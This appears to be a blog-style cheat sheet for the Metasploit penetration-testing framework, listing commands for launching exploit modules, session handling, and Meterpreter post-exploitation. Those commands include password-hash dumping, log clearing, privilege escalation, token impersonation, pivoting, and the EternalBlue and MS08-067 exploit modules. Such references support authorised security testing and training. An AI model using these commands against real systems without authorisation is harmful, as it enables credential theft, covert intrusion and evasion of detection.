A few months ago I have created a msfvenom cheat sheet without explaining the Metasploit framework, so here it is a brief cheat sheet.
Metasploit is a free tool that has built-in exploits which aids in gaining remote access to a system by exploiting a vulnerability in that server.
General Information
| Command |
Description |
|---|
| msfconsole |
Launch program |
| version |
Display current version |
| msfupdate |
Pull the weekly update |
makerc <FILE.rc> |
Saves recent commands to file |
msfconsole -r <FILE.rc> |
Loads a resource file |
Executing an Exploit / Scanner / Module
| Command |
Description |
|---|
use <MODULE> |
Set the exploit to use |
set payload <PAYLOAD> |
Set the payload |
| show options |
Show all options |
set <OPTION> <SETTING> |
Set a setting |
| exploit or run |
Execute the exploit |
Session Handling
| Command |
Description |
|---|
| sessions -l |
List all sessions |
sessions -i <ID> |
Interact/attach to session |
| background or ^Z |
Detach from session |
Using the Database
The DB saves data found during exploitation. Auxiliary scan results, hashdumps, and credentials show up in the DB.
- First Time Setup (Run from linux command line.)
| Command |
Description |
|---|
| service postgresql Start |
Start DB |
| msfdb Init |
Init the DB |
| Command |
Description |
|---|
| db_status |
Should say connected |
| hosts |
Show hosts in DB |
| services |
Show ports in DB |
| vulns |
Show all vulns found |
Meterpreter Session Commands
The Meterpreter is a payload within the Metasploit Framework that provides control over an exploited target system, running as a DLL loaded inside of any process on a target machine.
| Command |
Description |
|---|
| sysinfo |
Show system info |
| ps |
Show running processes |
kill <PID> |
Terminate a process |
| getuid |
Show your user ID |
| upload / download |
Upload / download a file |
| pwd / lpwd |
Print working directory (local / remote) |
| cd / lcd |
Change directory (local / remote) |
| cat |
Show contents of a file |
edit <FILE> |
Edit a file (vim) |
| shell |
Drop into a shell on the target machine |
migrate <PID> |
Switch to another process |
| hashdump |
Show all pw hashes (Windows only) |
| idletime |
Display idle time of user |
| screenshot |
Take a screenshot |
| clearev |
Clear the logs |
| Command |
Description |
|---|
| use priv |
Load the script |
| getsystem |
Elevate your privs |
| getprivs |
Elevate your privs |
- Token Stealing (Windows only)
| Command |
Description |
|---|
| use incognito |
Load the script |
| list_tokens -u |
Show all tokens |
| impersonate_token |
DOMAIN\USER Use token |
| drop_token |
Stop using token |
| Command |
Description |
|---|
portfwd [ADD/DELETE] -L <LHOST> -l 3388 -r <RHOST> -p 3389 |
Enable port forwarding |
route add <SUBNET> <MASK> |
Pivot through a session by adding a route within msf |
route add 192.168.0.0/24 |
Pivot through a session by adding a route within msf |
route add 192.168.0.0/24 -d |
Deleting a route within msf |
Finding an Exploit / Payload to Use
| Command |
Description |
|---|
search <TERM> |
Searches all exploits, payloads, and auxiliary modules |
| show exploits |
Show all exploits |
| show payloads |
Show all payloads |
| show auxiliary |
Show all auxiliary modules (like scanners) |
| show all |
* |
My favorite
| Command |
Description |
|---|
| use auxiliary/scanner/smb/smb_enumshares |
SMB Share Enumeration |
| use auxiliary/scanner/smb/smb_ms17_010 |
MS17-010 SMB RCE Detection |
| use exploit/windows/smb/ms17_010_eternalblue |
MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption |
| use exploit/windows/smb/ms17_010_psexec |
MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Code Execution |
| use exploit/windows/smb/ms08_067_netapi |
MS08-067 Microsoft Server Service Relative Path Stack Corruption |
| use exploit/windows/smb/psexec |
Microsoft Windows Authenticated User Code Execution |
| use exploit/multi/ssh/sshexec |
SSH User Code Execution (good for using meterpreter) |
| use post/windows/gather/arp_scanner |
Windows Gather ARP Scanner |
| use post/windows/gather/enum_applications |
Windows Gather Installed Application Enumeration |
| run getgui -e |
Enables RDP for Windows in meterpreter session |
External Resources
